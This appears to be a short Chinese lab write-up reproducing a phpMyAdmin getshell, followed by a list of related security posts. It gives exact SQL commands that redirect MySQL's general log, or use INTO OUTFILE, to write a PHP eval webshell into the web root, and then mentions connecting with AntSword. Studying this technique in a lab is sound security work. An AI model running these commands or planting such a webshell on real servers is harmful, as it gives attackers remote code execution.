PhPMyadmin-cms漏洞复现

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码
show global variables like '%general%';
复制代码
set global general_log='on'; //⽇志保存状态开启;
复制代码
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码
show global variables like '%general%';
复制代码
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
cat&seven16 小时前
CISSP通过回顾
网络安全·cissp
hjh1982918 小时前
渗透前四天总结
网络·网络安全
ZLJ05072419 小时前
网络安全的基本练习
安全·网络安全
桑晒.19 小时前
Webshell连接工具原理
安全·web安全·网络安全
小红卒1 天前
sqli-labs靶场通关笔记:第1-4关 联合注入
网络安全·sql注入漏洞
捉鸭子2 天前
转转APP逆向
爬虫·python·网络安全·网络爬虫
半梦半醒*2 天前
OSPF实验一
运维·网络·网络协议·tcp/ip·网络安全·信息与通信
上海云盾商务经理杨杨2 天前
标题:2025游戏反外挂终极指南:从DMA对抗到生态治理的全面防御体系
游戏·网络安全
痴人说梦梦中人2 天前
Gin框架统一响应与中间件机制学习笔记
网络安全·中间件·go·gin
shenyan~2 天前
关于 验证码系统 详解
网络安全